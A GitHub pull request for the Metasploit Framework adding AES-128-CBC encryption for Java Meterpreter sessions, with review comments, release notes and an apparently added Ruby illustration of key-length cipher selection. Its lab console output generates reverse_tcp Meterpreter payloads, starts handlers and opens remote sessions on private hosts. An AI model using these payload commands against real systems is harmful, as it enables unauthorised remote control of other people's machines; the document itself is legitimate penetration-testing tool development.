
Support AES-128-CBC as an additional option for TLV encryption #13783


Merged
merged 4 commits into from
Jul 9, 2020

Conversation

zeroSteiner

This adds AES-128-CBC as an additional option for TLV encryption. Currently, the only instance in which this should be used is when a Java Meterpreter is running in an environment which lacks strong crypto (such as the default configuration of older versions). A lot of the logic I added relies on the notion that if encrypt is enabled, it's AES-something and the key length is used to determine whether it's AES-128 or AES-256.

See: rapid7/metasploit-payloads#418

Verification

  • Install the Java binaries per the instructions in "Support AES-128-CBC For Java's TLV Crypt" (metasploit-payloads#418)
  • Open a Java Meterpreter session, using an older Java version such as 1.8.0_131
  • Use sessions -v to see the encryption type that's used (again based on the key length)
  • Open a non-Java Meterpreter session, see that it's using AES-256 and responsive
  • Make sure both Meterpreter sessions are still functional (use post/test/meterpreter)

Example Output
  • Session 1 - Windows Java running 1.8.0_131
  • Session 2 - Linux Java running OpenJDK 1.8.0_252
  • Session 3 - Linux Python, showing it still negotiates AES-256
msf5 payload(java/meterpreter/reverse_tcp) > show options 

Module options (payload/java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

msf5 payload(java/meterpreter/reverse_tcp) > 
msf5 payload(java/meterpreter/reverse_tcp) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf5 payload(java/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 0
msf5 payload(java/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 

msf5 payload(java/meterpreter/reverse_tcp) > generate -f raw -o /tmp/meterpreter.jar
[*] Writing 5312 bytes to /tmp/meterpreter.jar...
msf5 payload(java/meterpreter/reverse_tcp) > WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/meterpreter.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

[*] Sending stage (58121 bytes) to 192.168.159.30
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.30:50334) at 2020-06-29 17:43:53 -0400
[*] Sending stage (58121 bytes) to 192.168.159.128
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.128:57446) at 2020-06-29 17:44:08 -0400
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.jar is being used

msf5 payload(java/meterpreter/reverse_tcp) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter windows
        Info: Spencer McIntyre @ DESKTOP-RTCRBEV
      Tunnel: 192.168.159.128:4444 -> 192.168.159.30:50334 (192.168.159.30)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-128-CBC)
        UUID: 7a540d69968d7dd9/java=17/windows=1/2020-06-29T21:43:53Z
     CheckIn: 20s ago @ 2020-06-29 17:43:53 -0400
  Registered: No

  Session ID: 2
        Name: 
        Type: meterpreter linux
        Info: smcintyre @ localhost.localdomain
      Tunnel: 192.168.159.128:4444 -> 192.168.159.128:57446 (192.168.159.128)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: 1ce656d6e81fa519/java=17/linux=6/2020-06-29T21:44:08Z
     CheckIn: 5s ago @ 2020-06-29 17:44:08 -0400
  Registered: No
msf5 payload(java/meterpreter/reverse_tcp) > use payload/python/meterpreter/reverse_tcp
msf5 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf5 payload(python/meterpreter/reverse_tcp) > generate -f raw -o /tmp/meterpreter.py
[*] Writing 501 bytes to /tmp/meterpreter.py...
msf5 payload(python/meterpreter/reverse_tcp) > jobs -K
Stopping all jobs...
msf5 payload(python/meterpreter/reverse_tcp) > to_handler 
[*] Payload Handler Started as Job 1
msf5 payload(python/meterpreter/reverse_tcp) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (39240 bytes) to 192.168.159.128
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.128:57450) at 2020-06-29 17:44:38 -0400

msf5 payload(python/meterpreter/reverse_tcp) > sessions -v

Active sessions
===============

  Session ID: 1
        Name: 
        Type: meterpreter windows
        Info: Spencer McIntyre @ DESKTOP-RTCRBEV
      Tunnel: 192.168.159.128:4444 -> 192.168.159.30:50334 (192.168.159.30)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-128-CBC)
        UUID: 7a540d69968d7dd9/java=17/windows=1/2020-06-29T21:43:53Z
     CheckIn: 48s ago @ 2020-06-29 17:43:53 -0400
  Registered: No

  Session ID: 2
        Name: 
        Type: meterpreter linux
        Info: smcintyre @ localhost.localdomain
      Tunnel: 192.168.159.128:4444 -> 192.168.159.128:57446 (192.168.159.128)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: 1ce656d6e81fa519/java=17/linux=6/2020-06-29T21:44:08Z
     CheckIn: 33s ago @ 2020-06-29 17:44:08 -0400
  Registered: No

  Session ID: 3
        Name: 
        Type: meterpreter linux
        Info: smcintyre @ localhost.localdomain
      Tunnel: 192.168.159.128:4444 -> 192.168.159.128:57450 (192.168.159.128)
         Via: exploit/multi/handler
   Encrypted: Yes (AES-256-CBC)
        UUID: 6a88be5987e8b2b2/python=20/linux=6/2020-06-29T21:44:38Z
     CheckIn: 2s ago @ 2020-06-29 17:44:39 -0400
  Registered: No
msf5 payload(python/meterpreter/reverse_tcp) >

Landing Notes

Once ready to be merged into 6.x, this will need to follow slightly modified instructions from here.

  1. The metasploit-payloads side should be landed first
    • A gem should be built and released, let me know and I can assist with that
  2. Resume from step 2 in the build instructions
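A worked illustration of the rule the description relies on, that the negotiated key's length alone decides between AES-128-CBC and AES-256-CBC once encryption is enabled. This is an example added here, not Metasploit's own TLV code; it uses Ruby's standard OpenSSL binding, and the constant names, `tlv_cipher_for`, `encryption_label`, `tlv_encrypt`/`tlv_decrypt` and the simplified `negotiate_key` helper are assumptions for illustration. The packet body is constructed sample data.

```ruby
require 'openssl'

# Constructed mapping (not Metasploit's own constants): the key length in bytes
# selects the cipher, which is the same idea the PR description relies on.
AES_CIPHER_BY_KEY_LEN = {
  16 => 'aes-128-cbc',
  32 => 'aes-256-cbc'
}.freeze

AES_BLOCK_SIZE = 16

# Return the cipher name for a key, or nil when encryption is disabled (no key).
# Any other length is rejected outright, so a truncated or corrupted key can never
# silently select a configuration that was not negotiated.
def tlv_cipher_for(key)
  return nil if key.nil? || key.empty?
  name = AES_CIPHER_BY_KEY_LEN[key.bytesize]
  raise ArgumentError, "unsupported TLV key length: #{key.bytesize} bytes" unless name
  name
end

# Label in the style of the `sessions -v` output above: "Yes (AES-128-CBC)" or "No".
def encryption_label(key)
  name = tlv_cipher_for(key)
  name ? "Yes (#{name.upcase})" : 'No'
end

# Encrypt a packet body as IV || ciphertext, with a fresh random IV for every packet
# so that identical bodies never produce identical ciphertext under the same key.
def tlv_encrypt(key, plaintext)
  cipher = OpenSSL::Cipher.new(tlv_cipher_for(key))
  cipher.encrypt
  cipher.key = key
  iv = cipher.random_iv                      # generates, sets and returns the IV
  body = plaintext.empty? ? ''.b : cipher.update(plaintext)
  iv + body + cipher.final
end

# Reverse of tlv_encrypt. A blob shorter than IV plus one block cannot be valid CBC
# output, so it is rejected before OpenSSL is even asked to look at it.
def tlv_decrypt(key, blob)
  raise ArgumentError, 'ciphertext too short' if blob.bytesize < 2 * AES_BLOCK_SIZE
  cipher = OpenSSL::Cipher.new(tlv_cipher_for(key))
  cipher.decrypt
  cipher.key = key
  cipher.iv = blob.byteslice(0, AES_BLOCK_SIZE)
  cipher.update(blob.byteslice(AES_BLOCK_SIZE..-1)) + cipher.final
end

# Hypothetical stand-in for the negotiation: a peer that lacks strong crypto caps the
# key size it can accept, and the resulting key length then drives everything above.
def negotiate_key(peer_max_key_bits)
  bits = peer_max_key_bits >= 256 ? 256 : 128
  OpenSSL::Random.random_bytes(bits / 8)
end

if __FILE__ == $PROGRAM_NAME
  packet = 'constructed TLV packet body'.b   # constructed sample, not a real packet
  [128, 256].each do |peer_bits|
    key = negotiate_key(peer_bits)
    blob = tlv_encrypt(key, packet)
    puts "peer limited to #{peer_bits}-bit keys -> Encrypted: #{encryption_label(key)}, " \
         "round trip ok: #{tlv_decrypt(key, blob) == packet}"
  end
end
```

Running the block prints one line per simulated peer; the AES-128 line corresponds to the older Java session in the output above and the AES-256 line to the native and Python sessions.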

@zeroSteiner zeroSteiner added meterpreter bug msf6 PRs that need to be landed into the msf 6 branch labels Jun 29, 2020

@OJ OJ left a comment


I was going to nitpick and say "use type != NONE rather than type == .. || type =="... for future-proofing, then I realised that we're calling AES encryption functions.. not generic ones. So it makes perfect sense.

Looks good to me! Nice work as always mate.

@bwatters-r7 bwatters-r7 self-assigned this Jun 30, 2020
@bwatters-r7

Now that rapid7/metasploit-payloads#418 has landed and payloads gem 2.0.7 has been released, would you like to add the payload bump to this PR?

@zeroSteiner

Bumped this to use metasploit-payloads 2.0.9 now.

@bwatters-r7

(screenshot)
The only failure was one where the session was established, but cmd_exec failed on stderr again:
(screenshot)

@bwatters-r7

Also, encryption citation:
(screenshot)

@bwatters-r7

Also, just to be sure, I ran it against a regular binary payload as well...
(screenshot)

@timwr

timwr commented Jul 9, 2020

We need rapid7/metasploit-payloads#421 on the 6.x branch for 100% test passes.
I've landed it myself and will update the gem and payload sizes once it's built.

@bwatters-r7 bwatters-r7 merged commit f3cfa49 into rapid7:6.x Jul 9, 2020
@bwatters-r7

bwatters-r7 commented Jul 9, 2020

Original Release Notes
This PR fixes a bug that came in with updates to recent cryptography changes; previously, we assumed all Java releases would be able to support 256-bit encryption, but some older environments cannot support that. Here, we add AES-128-CBC as an additional option for TLV encryption as a fallback if the remote Java version cannot negotiate 256-bit.

@adfoster-r7 adfoster-r7 added the rn-fix release notes fix label Aug 6, 2020
@pbarry-r7

Release Notes

Fixed a bug related to recent cryptography changes, where Java Meterpreter payloads may not have access to 256-bit encryption. This fix allows Meterpreter running in older Java environments to use AES-128-CBC if 256-bit encryption is not available.

@zeroSteiner zeroSteiner deleted the feat/tlv-crypt/aes-128 branch February 23, 2021 17:12